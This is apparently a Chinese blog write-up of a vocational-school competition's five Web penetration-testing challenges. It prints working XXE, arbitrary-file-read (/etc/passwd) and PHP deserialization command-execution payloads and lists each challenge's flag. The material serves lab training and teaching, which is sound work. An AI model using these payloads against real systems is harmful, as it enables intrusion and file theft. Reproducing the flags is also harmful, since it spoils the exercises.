中职网络安全比赛之Web综合渗透测试

简介

有什么不会的可以来问我:162099475,需要题目什么的也可以来找我,欢迎交流

1.通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
2.通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
3.通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;
5.通过URL访问http://靶机IP/5,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

1.通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面
在这里插入图片描述
根据提示访问flagishere.php,又发现提示。Ctrl + U 发现并没有flag
在这里插入图片描述
在这里插入图片描述
打开burpsuite 抓包进行分析
在这里插入图片描述
发现可疑的base64字符串,解密获取flag
在这里插入图片描述
在这里插入图片描述

flag{Zf@BxsTo}

2.通过URL访问http://靶机IP/2,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面2, 根据页面英文提示,你要买最新的安卓手机吗?
在这里插入图片描述
尝试抓包修改User-Agent(浏览器请求头)
在这里插入图片描述
由于我们不清楚最新版本是多少,发送到爆破模块进行爆破
在这里插入图片描述

接下来跟我进行操作,选择数字进行爆破 在这里插入图片描述
点击长度,可以发现异样的请求包
在这里插入图片描述
点击12返回包,发现响应值回显flag

在这里插入图片描述

flag{&k5#Be*m}

3.通过URL访问http://靶机IP/3,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面
在这里插入图片描述
发现flag在/etc目录下,说明要进行读取操作,再看xml的关键字,可以判断出是XML外部实体引用注入漏洞

关于XXE的利用可以参考我的另一篇文章

https://blog.csdn.net/weixin_53912233/article/details/129077736

抓包,添加payload
在这里插入图片描述

<?xml version = "1.0"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/flag.txt">
]>
<x>&xxe;</x>

返回页面,发现flag显示出来了
在这里插入图片描述

flag{!Beb9idl}

4.通过URL访问http://靶机IP/4,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面,点击GOGOGO!,会出现flag提示
在这里插入图片描述
在?filename=后修改为/etc/passwd,尝试文件读取操作,发现存在任意文件读取漏洞

?filename=/etc/passwd&submit=GOGOGO%21

在这里插入图片描述
修改为flag.zip,成功获取flag

Payload:

?filename=/flag.zip&submit=GOGOGO%21
在这里插入图片描述

flag{@GCwqrUH}

5.通过URL访问http://靶机IP/5,对该页面进行渗透测试,将完成后返回的结果内容作为FLAG值提交;

访问页面,可以看见是关于php反序列化的题目。
在这里插入图片描述

我们直接抓住关键点,不要浪费精力。大概看一下具体关键内容,第一个框框属于变量接收,第二个框框属于属于执行php语句,第三个框框属于反序列化提交的内容,最后提交至r的接收变量
在这里插入图片描述

在本地编写php文件对payload进行序列化

<?php
class PHPObjectInjection {
	public $inject = "system('cat flag.php');";
	// $inject变量接收php执行语句
}

$a  = new  PHPObjectInjection; //创建指定类名
echo serialize($a);   // 将结果进行序列化
?>

payload:

?r=O:18:"PHPObjectInjection":1:{s:6:"inject";s:23:"system('cat flag.php');";}

查看源代码获取flag
在这里插入图片描述

flag{Ig5hs$e#}

总结

一次关于简单的web渗透页面的笔记,有什么不懂的都可以找我。

PS:别光顾着收藏啊,看我那么辛苦,顺便点赞呀

  • 12
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
2023年中职教育中的网络安全课程将会涉及江西的web安全渗透测试。江西是我国重要的经济和科技发展地区,网络安全问题日益凸显,因此对于这一领域的本地人才培养尤为重要。 首先,课程将着重培养学生的基础知识,包括网络原理、服务器的架设与维护、网站开发等方面的知识,确保学生对网络技术有深入的理解。学习基础知识可以为学生之后的学习和实践奠定坚实的基础。 其次,学生将学习web安全渗透测试的基本概念和原理,并通过案例分析和实践操作来加深理解。课程将引导学生了解常见的web安全漏洞,如跨站脚本攻击(XSS)、SQL注入攻击等,以及如何进行渗透测试来发现并修复这些漏洞。 此外,课程还将重点介绍江西地区的网络安全现状和需求,引导学生了解区域特色和行业需求,培养适应地方发展的能力。学生将有机会参与实际的安全渗透测试项目,深入了解江西地区的网络安全挑战,提升解决问题的能力。 最后,学生将通过实践实验和项目实训来提高技能。他们将学习使用先进的渗透测试工具和技术,如Burp Suite、Nessus等,进行安全漏洞扫描和渗透测试。通过实践训练,学生将能够掌握常见的web安全漏洞修复和防范方法。 总之,2023年中职网络安全课程包含江西web安全渗透测试内容,旨在培养学生的基础知识和技能,让他们能够应对江西地区的网络安全挑战。通过这样的培养,我们可以为江西地区的网络安全建设和发展做出积极贡献。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cike_y

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值